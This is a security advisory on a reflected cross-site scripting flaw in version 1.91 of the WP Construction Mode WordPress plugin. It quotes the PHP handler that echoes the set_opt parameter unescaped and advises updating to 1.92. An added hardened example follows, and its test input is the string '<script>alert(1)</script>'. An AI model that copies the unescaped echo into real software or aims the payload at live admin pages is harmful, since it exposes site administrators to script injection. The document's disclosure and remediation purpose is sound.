Title: WordPress 'WP Construction Mode' plugin - XSS
Version: 1.91
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/wp-construction-mode/
Contacted vendor: 2014/10/20

----------------------------------------------------------------
## Plugin description:
----------------------------------------------------------------

Set entire website or specific page under construction or maintenance for all viewers except Admin

----------------------------------------------------------------
## Reflected XSS:
----------------------------------------------------------------

The set_opt parameter is echoed back unsanitized to the admin user when saving, allowing the injection of arbitrary script and HTML into the admin page.

Vulnerable code:

```php
if (isset($_REQUEST['act'])) {
    switch ($_REQUEST['act']) {
        case "save":
            set_under_construction();
            echo '
Under Construction: ' . ($_REQUEST['set_opt']) . '
';
            break;
        default:
    }
}
```

PoC: Log in as admin and submit the following form.

----------------------------------------------------------------
## Solution
----------------------------------------------------------------

Update to version 1.92.
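The following is an added example, not the plugin's code or the fix shipped in 1.92: the advisory's unsafe echo next to a hardened handler that rejects unknown option values, requires a valid admin nonce, and escapes anything it reflects. In WordPress the escaper would be esc_html() and the nonce check check_admin_referer(); plain PHP stand-ins are used so the file runs outside WordPress, and the allow-list values and the nonce flag are assumptions.

```php
<?php
// Added example (not the plugin's code). esc_html()/check_admin_referer() are
// replaced by stand-ins so this runs without WordPress (assumption).

// Vulnerable pattern from the advisory: the request value goes into HTML raw.
function render_unsafe(string $set_opt): string
{
    return 'Under Construction: ' . $set_opt;
}

// Stand-in for esc_html(): entity-encode & < > " ' so the value is inert as HTML text.
function esc_html_standin(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: a save must carry a valid nonce (defeats the "submit this form"
// style of attack on the admin), set_opt must be one of the known values (the
// allow-list is constructed; the plugin's real values are not on the page), and
// whatever is reflected is escaped.
function render_safe(array $request, bool $nonce_valid): ?string
{
    if (!$nonce_valid) {
        return null;                      // refuse saves not backed by an admin nonce
    }
    $allowed = ['on', 'off'];             // constructed allow-list (assumption)
    $opt = $request['set_opt'] ?? '';
    if (!in_array($opt, $allowed, true)) {
        return null;                      // unknown value is never reflected
    }
    return 'Under Construction: ' . esc_html_standin($opt);
}

// Constructed request in the shape of the advisory's PoC, with a harmless test string.
$request = ['act' => 'save', 'set_opt' => '<script>alert(1)</script>'];

echo render_unsafe($request['set_opt']), PHP_EOL;       // markup reaches the browser intact
var_dump(render_safe($request, true));                  // rejected by the allow-list
var_dump(render_safe(['set_opt' => 'on'], false));      // rejected for the missing nonce
echo render_safe(['set_opt' => 'on'], true), PHP_EOL;   // the only path that renders
echo esc_html_standin($request['set_opt']), PHP_EOL;    // escaping alone already neutralises it
```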